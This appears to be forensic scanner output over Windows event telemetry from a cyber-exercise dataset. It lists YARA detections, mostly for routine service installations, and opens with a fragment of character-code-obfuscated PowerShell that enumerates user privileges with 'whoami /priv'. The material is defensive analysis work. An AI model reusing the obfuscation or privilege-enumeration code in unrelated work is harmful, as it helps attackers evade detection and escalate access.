,91,80 , 97 ,114 ,97 ,109 ,101 , 116 , 101 ,114,40,80, 111, 115,105, 116, 105 ,111 , 110,32,61 ,32,48,41,93 , 32 ,91,86 , 97 , 108,105,100, 97 ,116,101 ,78, 111 , 116, 78,117, 108, 108 ,79 , 114 ,69 ,109 ,112, 116,121 , 40 , 41 , 93 , 32 ,91 ,83,116 , 114, 105 , 110 ,103, 93 ,32 ,36 ,80,114 ,105, 118, 41,13 , 10 ,32 , 32,32 ,32 ,36, 114,101 , 115,32,61 ,32,36 , 78, 85 , 76 , 76, 59, 13,10, 32 , 32,32, 32 ,119, 104 , 111 ,97 , 109 ,105 , 32,47 , 112 , 114 , 105 ,118 , 32,124, 32,83 ,101, 108 ,101, 99 , 116,45 , 83, 116 ,114, 105, 110, 103,32,45, 80 ,97 ,116, 116 ,101 , 114,110,32, 36 ,80 ,114 , 105, 118,32 , 124 , 32,70, 111 ,
SCORE:
60
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule Casing_Anomaly_Join / Detects suspicious casing of join statement
SUBSCORE_1:
60
REF_1:
Internal Research
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • -joIN
RULEDATE_1:
2018-12-26
TAGS_1:
ANOMALY, CASING, SCRIPT, SUSP, T1027
RULENAME_1:
Casing_Anomaly_Join
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notices
Notice 1
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "WWnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.340Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tAarSvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc00025", "os": {"name": "Windows 11 Pro", "platform": "windows", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "id": "4f4[...]10.24.69.11"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k AarSvcGroup -p", "ServiceName": "AarSvc_1b457e39", "ClientProcessId": "2932", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195186, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 780}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 2
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "WmnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.348Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tcbdhsvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t2\n\tService Account: \t\tLocalSystem"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "os": {"platform": "windows", "name": "Windows 11 Pro", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows"[...]9.11"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k ClipboardSvcGroup -p", "ServiceName": "cbdhsvc_1b457e39", "ClientProcessId": "2932", "ParentProcessId": "648", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ServiceStartType": "2", "SubjectUserName": "PC00025$"}, "record_id": 195190, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 780}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 3
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "W2nKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.356Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tCredentialEnrollmentManagerUserSvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\CredentialEnrollmentManager.exe\n\tService Type: \t\t0xD0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "os": {"name": "Windows 11 Pro", "platform": "windows", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.08[...]_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\CredentialEnrollmentManager.exe", "ServiceName": "CredentialEnrollmentManagerUserSvc_1b457e39", "ClientProcessId": "2932", "ParentProcessId": "648", "ClientProcessStartKey": "4503599627370561", "ServiceType": "0xd0", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195194, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 4
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "XGnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.364Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "code": "4697", "action": "Security System Extension", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tMessagingService_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "log": {"level": "information"}, "index": "cyberpolygon2024-mercurylark-win", "@version": "1", "host": {"name": "pc00025", "os": {"platform": "windows", "name": "Windows 11 Pro", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}[...]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup", "ClientProcessId": "2932", "ServiceName": "MessagingService_1b457e39", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195198, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 5
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "XWnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.372Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tP9RdrService_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k P9RdrService -p\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "name": "pc00025", "os": {"name": "Windows 11 Pro", "platform": "windows", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)"[...].11"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k P9RdrService -p", "ClientProcessId": "2932", "ServiceName": "P9RdrService_1b457e39", "ParentProcessId": "648", "ClientProcessStartKey": "4503599627370561", "ServiceType": "0xe0", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195202, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 6
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "XmnKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.379Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tUdkUserSvc_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k UdkSvcGroup\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"name": "pc00025", "os": {"name": "Windows 11 Pro", "platform": "windows", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windows", "family": "windows"}, "id": "4f[...].24.69.11"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k UdkSvcGroup", "ClientProcessId": "2932", "ServiceName": "UdkUserSvc_1b457e39", "ParentProcessId": "648", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195206, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 7
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "X2nKt5EBNKI3r7qcapMA", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.388Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "action": "Security System Extension", "code": "4697", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tWpnUserService_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup\n\tService Type: \t\t0xE0\n\tService Start Type:\t2\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "os": {"name": "Windows 11 Pro", "platform": "windows", "version": "10.0", "build": "22631.4037", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type": "windo[...]"]}, "tags": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k UnistackSvcGroup", "ClientProcessId": "2932", "ServiceName": "WpnUserService_1b457e39", "ServiceType": "0xe0", "ParentProcessId": "648", "ClientProcessStartKey": "4503599627370561", "ServiceStartType": "2", "SubjectUserName": "PC00025$"}, "record_id": 195210, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 8
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
{"_index": "cyberpolygon2024-mercurylark-win", "_id": "1mnKt5EBNKI3r7qcapMD", "_score": 1, "_source": {"@timestamp": "2024-09-03T12:09:11.342Z", "type": "wineventlog", "event": {"created": "2024-09-03T12:09:34.740Z", "provider": "Microsoft-Windows-Security-Auditing", "kind": "event", "code": "4697", "action": "Security System Extension", "outcome": "success", "original": "A service was installed in the system.\n\nSubject:\n\tSecurity ID:\t\tS-1-5-18\n\tAccount Name:\t\tPC00025$\n\tAccount Domain:\t\tMERCURYLARK\n\tLogon ID:\t\t0x3E7\n\nService Information:\n\tService Name: \t\tBcastDVRUserService_1b457e39\n\tService File Name:\tC:\\Windows\\system32\\svchost.exe -k BcastDVRUserService\n\tService Type: \t\t0xE0\n\tService Start Type:\t3\n\tService Account: \t\tLocalSystem"}, "index": "cyberpolygon2024-mercurylark-win", "log": {"level": "information"}, "@version": "1", "host": {"id": "4f4df1f2-238c-448d-b765-901e1c9f316b", "os": {"name": "Windows 11 Pro", "platform": "windows", "build": "22631.4037", "version": "10.0", "kernel": "10.0.22621.4036 (WinBuild.160101.0800)", "type"[...]gs": ["beats_input_codec_plain_applied"], "winlog": {"event_id": "4697", "activity_id": "{de971a9d-ee56-0000-b01b-97de56eeda01}", "opcode": "Info", "provider_name": "Microsoft-Windows-Security-Auditing", "keywords": ["Audit Success"], "event_data": {"SubjectUserSid": "S-1-5-18", "SubjectDomainName": "MERCURYLARK", "ServiceAccount": "LocalSystem", "SubjectLogonId": "0x3e7", "ServiceFileName": "C:\\Windows\\system32\\svchost.exe -k BcastDVRUserService", "ServiceName": "BcastDVRUserService_1b457e39", "ClientProcessId": "2932", "ServiceType": "0xe0", "ClientProcessStartKey": "4503599627370561", "ParentProcessId": "648", "ServiceStartType": "3", "SubjectUserName": "PC00025$"}, "record_id": 195187, "api": "wineventlog", "task": "Security System Extension", "channel": "Security", "version": 1, "computer_name": "pc00025.MercuryLark.corp", "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", "process": {"pid": 704, "thread": {"id": 6580}}}}}
SCORE:
45
FILE:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
LOG_MODIFIED:
Fri Sep 6 22:17:40 2024
LOG_ACCESSED:
Tue Sep 10 11:51:35 2024
LOG_CREATED:
Tue Sep 10 11:51:18 2024
REASON_1:
YARA rule LOG_Service_Install / Detects a new service install in Eventlog that includes an executable outside of Program Files folder
SUBSCORE_1:
45
SIGTYPE_1:
internal
SIGCLASS_1:
YARA Rule
MATCHED_1
  • A service was installed in the system.
RULEDATE_1:
2017-06-18
TAGS_1:
LOG, T1569_002
RULENAME_1:
LOG_Service_Install
AUTHOR_1:
Florian Roth
REASONS_COUNT:
1
FILE_1:
D:\CYBERPOLYGON\artefacts\cyberpolygon2024-telemetry-win\win\data\cyberpolygon2024-mercurylark-win.json
EXISTS_1:
yes
TYPE_1:
UNKNOWN
SIZE_1:
6924911828
FIRSTBYTES_1:
7b225f696e646578223a20226379626572706f6c / {"_index": "cyberpol
CREATED_1:
Tue Sep 10 11:51:18.705 2024
OWNER_1:
WIN-LRTT94FA08M\pa.ivanov
Notice 9
Sep 10 18:26:38 WIN-LRTT94FA08M/10.100.5.12
MODULE:
LogScan
MESSAGE:
Notable Log Entry found
ENTRY:
